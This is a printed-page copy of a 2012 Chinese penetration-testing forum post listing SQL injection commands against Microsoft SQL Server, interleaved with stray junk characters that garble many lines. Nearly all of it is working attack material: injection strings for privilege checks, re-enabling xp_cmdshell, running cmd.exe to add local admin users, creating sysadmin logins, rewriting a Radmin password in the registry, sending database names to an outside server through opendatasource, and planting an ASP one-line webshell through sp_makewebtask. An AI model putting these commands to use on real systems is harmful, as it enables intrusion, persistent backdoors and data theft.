中国网络渗透测试联盟

标题: 阿D常用的一些注入命令 [打印本页]
作者: admin    时间: 2012-9-13 17:26
标题: 阿D常用的一些注入命令
阿D常用的一些注入命令
1 n* W3 A. h& _9 u//看看是什么权限的
$ l+ S1 ~/ Y0 o9 _) y) r0 y1 O: c  u2 Gand 1=(Select IS_MEMBER('db_owner'))
5 H" t( r: u) P) l4 ^: L2 O( wAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
. u% h. _( W! T5 q
" M/ @9 H% J% @, ^4 }9 Q//检测是否有读取某数据库的权限  S, [% J2 N& {- R' K
and 1= (Select HAS_DBACCESS('master'))* p# [6 D& j2 ?! q0 `0 D
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --: L- C' Q+ f  p) }" ]
) J- C& z9 e- i/ i4 T! I
* I4 I: T, p9 s( e) X5 s- |1 G
数字类型5 `6 H0 j5 l1 ?# @. M+ ]) f
and char(124)%2Buser%2Bchar(124)=0
, w- z6 D7 M) _. m' S8 U  c( g3 c. u; }* _
字符类型1 \4 L. M) D. @2 `7 b
' and char(124)%2Buser%2Bchar(124)=0 and ''='( G3 V% x  B9 O; a% K1 A- n
0 s' i# H8 x! L1 ]% J! s7 S
搜索类型- {4 J+ Y+ H# g: d) H( {: X/ \
' and char(124)%2Buser%2Bchar(124)=0 and '%'='7 ~* j# N* Y$ v( g& H+ S) A
- a) r& ?& f* Y" R$ a3 K+ q
爆用户名
# Y8 }  E+ X# N. {7 Xand user>0
" r0 ~' B6 ~  a' and user>0 and ''='
+ V, \! V1 C7 a* z9 @6 q1 l1 c8 j& P) H# H
检测是否为SA权限
6 X5 Q; z( O) T: i1 band 1=(select IS_SRVROLEMEMBER('sysadmin'));--: r% ]0 x4 M4 b( `3 ~# {
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
' |8 M3 Q" z1 T. f" r
7 \: Y: U9 A6 l7 _6 k* n- Q检测是不是MSSQL数据库# L. `0 [5 H) ?( s# I' V
and exists (select * from sysobjects);-- % l0 E( A- ^$ a7 v; T- u2 {9 a

8 E6 Y: }. ~- Z5 l2 i  I! D( P检测是否支持多行
1 @0 T$ x  N# f; T6 H# W2 ]' O;declare @d int;--   [) W  f* o" l* Z' `" J
* l4 V5 e! n% O: x, [" w" t9 g
恢复 xp_cmdshell/ Q  r  d  E; p. z/ }4 W# P- \, U
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
5 B- H7 i4 S; x0 V; w" n3 g; [: Y, L3 }: }8 t5 S# V  u: m
5 a, h8 K* A# V
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') ) I" U1 O9 K, @8 u5 b& z

9 T; f7 c  z0 R6 \  S+ }: }" ?5 e//-----------------------# m! \% {* S5 J* Z8 V9 F9 E
//      执行命令
. X* o6 {: E2 W+ |" \- Y//-----------------------7 i% m* ]8 _* H. g% O
首先开启沙盘模式:
) T# T- M; U0 _" m$ kexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1. i7 S7 |& ]3 \/ P6 v. w# ~

1 C3 }' d( @' o, ?3 B2 e9 y* x然后利用jet.oledb执行系统命令. Z5 X: ~5 A# ]/ U6 x; t" C$ U
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')8 `4 t# R# g( Q- t2 n; r' p# {

5 B$ ]4 H1 W* i( o; V0 `* Y4 M& s+ e执行命令
; @; ]; w& W& H+ ~7 q3 |- S;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--; R9 R4 w: A9 C% f

5 ~- f% A9 v2 k. _8 ?EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
4 {) \% Z4 z+ C/ d) ^6 U' }$ v7 d5 h; y
判断xp_cmdshell扩展存储过程是否存在:. |. C* b- o! `  U' ?, E* W) `" T
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
" E; r& R, b9 W+ z( S" w; N9 v/ F' V2 i4 ~) T, M
写注册表6 P4 A: |' e4 v4 ^8 q$ F5 I
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',18 P9 k2 ?: J6 v
" X" V/ _% B8 i$ n, ]  p
REG_SZ
* M6 q, H; R! F0 Q( u' |0 [4 }6 f. D& F& ~: V: f0 u
读注册表/ V$ E/ o: Z) N/ k
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
1 a0 S5 P) W- v) ^9 P$ t; Q
" B# M/ ~- v' S. w: s! s读取目录内容
/ P) z7 ^5 u/ w0 p  eexec master..xp_dirtree 'c:\winnt\system32\',1,1& T( G7 B( r5 x; P3 c7 A

) P9 }3 |- r" x3 r0 r) G5 R- f) R- W3 e7 _) a6 R) U1 d
数据库备份
! a0 x$ t$ P0 pbackup database pubs to disk = 'c:\123.bak'
! {6 y. P; h! }- P+ E2 O
" }4 s# }7 u9 Q( W5 a' b. o//爆出长度+ ?+ I( l$ B  A4 `5 s* C
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--' ]; G, j# @# b  I+ N- F
' f$ S# T2 Z, W1 {- Y

; w3 U5 C6 Z+ A+ |, f$ ^8 P& x! f8 K3 ?  |4 M& L# c9 h+ ]
更改sa口令方法:用sql综合利用工具连接后,执行命令:: I2 _: L/ O6 ]( i3 I7 Y
exec sp_password NULL,'新密码','sa'2 s- R" C$ e9 n$ r1 w' R: A
4 P3 x) {& W( U5 S0 M9 A$ \
添加和删除一个SA权限的用户test:' D5 U1 O  H6 z% t: P
exec master.dbo.sp_addlogin test,ptlove
9 q, N+ P. X: l* Y, c- ^4 O' Kexec master.dbo.sp_addsrvrolemember test,sysadmin
" ]6 n6 W5 S. Y, E7 b; r2 C7 I$ m
删除扩展存储过过程xp_cmdshell的语句:
9 @/ _& A% i; K& }; `exec sp_dropextendedproc 'xp_cmdshell'
2 ?! {) V! q  v, l  U4 C  G# Y1 d, P8 G% L' V
添加扩展存储过过程8 `3 ]. {. x$ ~( g1 ]% p
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
2 M* w" ]+ i' a8 h: |GRANT exec On xp_proxiedadata TO public
% Y* ~5 v+ I9 |: @9 S- u5 @0 w# c
" I* C; c9 ?+ I8 R- ?9 T: L, L  b8 K4 K0 x: y7 L1 R
停掉或激活某个服务。 ' `* T$ @8 f4 R) s' h
0 R) w6 V  s: V
exec master..xp_servicecontrol 'stop','schedule'
. j1 J# n& t" s* [1 @/ _& L8 mexec master..xp_servicecontrol 'start','schedule'# Z6 O( T( d+ a7 l. `) c6 T9 T

& \* y% P8 Z# E8 I3 _' U; C* J6 t9 Vdbo.xp_subdirs2 f( \8 m* l1 T6 P% r- k4 {

8 h, A+ Q5 H7 u; ]1 R" r) a只列某个目录下的子目录。
) Y. m, R. ?+ c, S; i4 x, vxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
3 l7 [/ D/ i5 o1 k' N: t
8 W1 T- V* c. ?" O9 a: _- Vdbo.xp_makecab6 \% t+ K+ A; C" @0 m- g
' _. ^: ^0 P; W: H" I3 \1 c
将目标多个档案压缩到某个目标档案之内。9 i% J# L4 h- l
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。) ?3 v' ~7 G: o$ R

) \0 ~9 c* u+ Zdbo.xp_makecab
0 h5 K2 Y0 d" L6 ~8 ]" D/ ~# t6 S'c:\test.cab','mszip',1,
6 w0 N8 w  b0 y6 ?) P; v' D'C:\Inetpub\wwwroot\SQLInject\login.asp'," `2 n" j+ Z+ Y8 d/ j# }5 D' W
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp') D2 @2 `. f0 W, b; g1 ^% T+ E" E! ~

, |9 W/ U+ W8 o7 b9 ?xp_terminate_process
  j: G' B1 w' h3 E9 r! c# z7 ~$ _/ t9 }( ~% R9 X. I
停掉某个执行中的程序,但赋予的参数是 Process ID。* H' w( z" C; q) ^- m0 U  E
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID( H/ Y1 y; b# l$ Q! J
& ~1 i+ E% m& O; N5 B1 [( c7 X
xp_terminate_process 2484
7 ]4 o0 @* d7 V. z3 Z
) x0 L" ?) M4 k. G7 a; Ixp_unpackcab
: d( ]. L) ]2 Y( @
1 f6 ^" @5 x! d) s解开压缩档。6 U' H3 \: u! [2 V+ k
, v8 e* Q, U& L0 H* n
xp_unpackcab 'c:\test.cab','c:\temp',1' p, [) K$ o% k: p$ y

( L" z. C$ C% Z; v% e) x7 q* {0 h( E5 K# v1 U
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
# m* ?. X5 ~5 c/ f7 c) v
6 e$ I, s* v9 h8 c, c% Q1 `! kcreate database lcx;
7 C4 h2 R* Y2 p! aCreate TABLE ku(name nvarchar(256) null);
0 r9 e, I1 r. q, YCreate TABLE biao(id int NULL,name nvarchar(256) null);
1 J+ i3 {$ @& k2 G; ]& }4 l! ?! w8 D7 s
//得到数据库名
+ y9 O( \3 M! _: A) ainsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases7 K! ^$ {  t- s8 p) [
8 j6 U  D1 i& H" L: S/ A/ l0 K" R

1 _0 ~; w( W; B/ ?( u) f6 f8 W' ?//在Master中创建表,看看权限怎样
/ C) W1 w2 X# b* m( KCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--+ a- F5 r9 n' U

- J& d7 j0 v0 v: N0 K用 sp_makewebtask直接在web目录里写入一句话马:3 D1 s/ X0 h5 p6 P$ Z9 s
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--1 D) T4 N4 y- q: X
$ ]* F& |1 n  x. u! b. _
//更新表内容
. Y0 p" Z) k2 i- x1 d2 Y9 j6 a4 BUpdate films SET kind = 'Dramatic' Where id = 123$ t  E- J- A5 R! G1 C
' f, N' w, F+ p, q: J# p( y" F
//删除内容7 @2 D1 t$ R3 P
delete from table_name where Stockid = 3



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2